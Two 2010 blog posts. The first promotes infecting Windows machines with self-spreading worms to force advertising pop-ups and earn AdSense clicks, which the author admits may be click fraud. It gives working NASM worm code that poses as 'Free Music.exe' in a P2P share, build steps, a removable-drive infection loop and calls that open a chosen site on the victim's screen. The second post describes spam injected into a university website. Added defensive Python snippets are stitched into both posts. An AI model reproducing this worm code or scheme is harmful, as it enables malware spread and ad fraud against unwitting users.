2010/08/31

Marketing in the *new* age using virii and worms for profit

I have coded bots, worms, virii and anything I can wrap my head around;
of them all, biological worms and virii are unique. But this post is
not about biocode, I'm talking about marketing with bots. I have seen
one bot that does this but it has a stupid payload and attacks too
strongly. Anyway I'm here to discuss and show how to market
successfully with a virus/worm.

I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.

You may wonder why this is necessary. Well einstein, some of us are
programmers (aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job, especially when everything we say
is technical; also when you want to make money with Google AdSense this
is a very good option. It may be considered click fraud but hey, you
showed them and they clicked; who's to blame, the interested client or
the coder ^_^

The whole idea is: infect a system, copy self to windir. PS: most virii
and worms meant to do some sort of public announcement or activism
target consumer OSes and the head is Windows. It doesn't mean we hate
Windows, it means that's where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.

So as I was saying, the idea is when our child first gets to a
compatible system, in this case Windows, it must first copy itself to
the Windows directory, then maybe write a registry rule to make it run
first when the system boots, run child2 (the one in the windir) and exit
child1 (probably on a flash drive). Now you can Winexec your site,
which in Windows will fire up the default browser with the address you
supplied, and the user sees magic: hey there's a site here, let's see.
Or they may close it, but if it keeps popping up like a TV ad they will
give in, believe me, I have studied psychology :D

You may now infect other removable drives and exes to spread around
quickly; you may also spread through p2p ^^

Here is code for a p2p worm in asm (NASM).
PS: I don't even have to show this, only a
*fool* wouldn't know how to spread hehe.

;############################
; This is in asm(NASM)      #
; compiled under OpenBSD4.6 #
;                           #
; lame p2p worm             #
;############################
[bits 32]
[global main]

[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]

[segment code public use32 class='CODE']
 main:
    call [lame]
lame:
    pop     ebp
    sub  ebp, [lame]            ; w00t you don't know this << o_O

    call [ebp+GetModuleHandleA]

    push  dword [ebp+szpath]
    push  dword eax
    call  [ebp+GetModuleFileNameA]

    push  dword 0x00000000
    push  dword [ebp+fake]
    push  dword [ebp+szpath]
    call  [ebp+CopyFileA]
   
    push dword 0x00000000
    call [ebp+ExitProcess]

[segment data public use32 class='DATA']
szpath      db 0x00000000
            times 0x00000100-$+szpath db 0 ; 256d

fake      db "C:\Progra~1\LimeWire\Free Music.exe", 0

This code is fully functional but not good :(
fake can be collected from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main

For alink you can download the old version and port it, or wait for
me to release my port, which has some funny errors:
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3

This is because I'm using strlcpy with a pointer as size and also I'm
compiling with
cc -O2 -pipe  -Wall -Werror -Wstrict-prototypes -c alink.c

If I take off -Werror -Wstrict-prototypes everything works fine. I'll
think about releasing it like that or corrected :)

Anyway, how to spread with removable drives: I have all the code but I
don't want to copy and share :( I'll share when I perfect it.

A little snippet though

...
    mov   word [ebp+szletter], 0x00000041 ; letter 'A'

seekem:
    mov   ecx, dword [ebp+szletter]
    mov   byte [ebp+szdrv], cl       ; lol nice eh?
   
    push  dword [ebp+szdrv]
    call  [ebp+GetDriveTypeA]

    cmp   eax, DRIVE_REMOVABLE
    je    eatit                    ; All removable Drives are mine
    inc   dword [ebp+szletter]
    cmp   word [ebp+szletter], 0x0000005a ; letter 'Z'
    jg    sleep_alil               ; should be sleep drives come and
                                   ; go u know :) Update:2010/06/15
                                   ; now we sleep hehe
    jmp   seekem

sleep_alil:
    push  0x00000014 ; 20 seconds ^^
    call  [ebp+Sleep]

    jmp   seekem     ; get back to work you idio

; Heres where you infect
eatit:
...


lol cool huh
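As an added, defender-side example that is not the post's code: a Python scan for the lure the p2p worm and the removable-drive snippet above rely on, a PE executable dropped under a media-sounding name such as "Free Music.exe". The share directory and its file contents are constructed for the demo.

```python
# Added example (not from the original post): scan a P2P share or removable
# drive for Windows PE files (MZ header) hiding behind media-looking names.
import os
import tempfile

MEDIA_WORDS = ("music", "song", "mp3", "video", "movie", "album", "free")
EXE_EXTS = (".exe", ".scr", ".com", ".pif", ".bat")
PE_MAGIC = b"MZ"

def is_pe_file(path):
    """True if the file starts with the DOS/PE 'MZ' magic."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == PE_MAGIC
    except OSError:
        return False

def suspicious_media_name(name):
    """Executable extension behind a name that promises audio or video."""
    root, ext = os.path.splitext(name.lower())
    return ext in EXE_EXTS and any(w in root for w in MEDIA_WORDS)

def scan_share(directory):
    """Sorted names of executables in `directory` disguised as media files."""
    hits = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and suspicious_media_name(name) and is_pe_file(path):
            hits.append(name)
    return sorted(hits)

def build_demo_share():
    """Constructed sample share: one disguised PE, one real-looking mp3, one
    honestly named PE.  Returns the temporary directory path."""
    d = tempfile.mkdtemp(prefix="share_")
    samples = {
        "Free Music.exe": b"MZ" + b"\x90" * 62,        # PE stub under a media name
        "track01.mp3": b"ID3\x03\x00" + b"\x00" * 60,  # ID3 tag, not a PE
        "setup.exe": b"MZ" + b"\x00" * 62,             # PE, but not a lure
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d

if __name__ == "__main__":
    print(scan_share(build_demo_share()))   # ['Free Music.exe']
```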

OK so with that you get a lot of clicks and attention. I think I'm
tired, I'll continue later I think :D

Oh I forgot the Winexec hehe

    push dword 0x00000005        ; SW_SHOW
    push dword [ebp+sitename]    ; eg http://www.google.com
    call [ebp+Winexec]

Or if you want to use ShellExecute

    push dword 0x00000005        ; SW_SHOW        hehe
    push dword 0x00000000        ; [directory]   not needed
    push dword 0x00000000        ; [parameters]  not needed
    push dword [ebp+sitename]    ; [sitename] eg http://www.google.com
    push dword 0x00000000        ;
    push dword 0x00000000        ; [hwnd]
    call [ebp+ShellExecute]


Choose your weapon. Remember that writing these creatures (our children)
is an art, so take time and don't make them hazardous;
take them as your little army. If you have ever taken Ninjutsu lessons
from a good *master*, he trains you with discipline first, spiritually
and physically. Code with passion and you will be happy forever.

Happy hacking, push that processor to the extreme :)

2010/08/30

Ghana Web Security and Code Practice Pt1

I was considering not blogging again, but when I think of it I really
need to, because people and especially developers need to read stuff (or shit)
like the ones I write. I hate to write, main reason why I quit a lot of jobs;
but not when it's very important.

This brings me to today's blog post: Ghana, yes that beautiful nation that is in
my "opinion" slowly drowning herself because of her ignorant children.
Developers in Ghana have the habit of copy and paste and drag n drop, at least with
most I have seen. For example I saw a guy at Swanzy (a shopping arcade) and he
says he wants to configure a Cisco router and he needs an IBM T41/42. I asked, can't you
use something else, and he says I don't want to suffer (meaning he doesn't want to hack it),
I want to do "exactly" what is in the book. The only thing I could say after that was
I'm no "robot".

I have worked with, hired and fired developers as the IT manager of a firm in East Legon,
all because of two things, "code design" and "security"; you can't give me very
unmaintainable code and poor design for approval or appreciation, and to worsen the case
the code is open to a lot of security issues. This may seem harsh, but I have watched
and monitored University of Ghana's website get hacked and remain hacked for 2 years+
till the present day.

Proof:
In the source of University of Ghana Legon (ug)'s mother site and some pages there is
a hidden CSS class that advertises viagra, which leads to a teacher/student tutorial site.

Tech Details:
    CSS class name: .RUACZA
    After the style block there is a div that contains the advert.

Verify:
    Go to http://www.google.com and input
    viagara site:ug.edu.gh
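As an added example that is not part of the original post: a small Python check for the kind of hidden pharma spam described above, a style rule that hides a class plus an element of that class whose text sells pills. The sample page is constructed; only the class name .RUACZA is taken from the post.

```python
import re
from html.parser import HTMLParser

HIDING = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I)
SPAM_WORDS = ("viagra", "viagara", "cialis", "pharmacy", "pills")
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr"}   # never get an end tag

def hidden_classes(css):
    """Set of class names whose rule in `css` hides the element."""
    return {m.group(1) for m in re.finditer(r"\.([\w-]+)\s*\{([^}]*)\}", css)
            if HIDING.search(m.group(2))}

class ClassTextCollector(HTMLParser):
    # Collects inline <style> CSS and the text under every element with a class.
    def __init__(self):
        super().__init__()
        self.in_style, self.css, self.stack, self.texts = False, "", [], {}
    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self.in_style = True
        if tag not in VOID_TAGS:
            self.stack.append((dict(attrs).get("class") or "").split())
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()
    def handle_data(self, data):
        if self.in_style:
            self.css += data
            return
        for cls in (c for classes in self.stack for c in classes):
            self.texts[cls] = self.texts.get(cls, "") + data

def find_hidden_spam(html):
    """Return [(class, text)] for hidden elements whose text contains spam words."""
    p = ClassTextCollector()
    p.feed(html)
    hits = []
    for cls in sorted(hidden_classes(p.css)):
        text = " ".join(p.texts.get(cls, "").split())
        if any(w in text.lower() for w in SPAM_WORDS):
            hits.append((cls, text))
    return hits

# Constructed sample page: a hidden div using the class name seen on the hacked site.
SAMPLE_PAGE = """<html><head><title>University</title>
<style>.RUACZA { display:none; }</style></head>
<body><div class="RUACZA">Buy viagra online cheap pills</div>
<p>Welcome to our campus.</p></body></html>"""
```

Running `find_hidden_spam(SAMPLE_PAGE)` on the constructed page reports the RUACZA div; a clean page with no hiding rule reports nothing.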

Well after you see that I guess you get the idea, and I could paste here
instructions and even code to replicate the attack they suffered, but I don't want any
issues as I could be charged with funny shit. Well this is not the only site
and proof I have. There are a lot more, and if you want to check if your site has been hacked
or if it's hackable, don't hesitate to email me or leave a comment saying so. It's FREE so
don't pressure me, I have a lot on my chest.

Well I'm tired, I'll continue this next time. In the meantime check that code:
if it takes more than 20 mins to trace a function, behold, you need to check your code design,
and "ONLY" use OOP when "NECESSARY". That new school thing sucks, return to the ways of C
you lame coders. ;p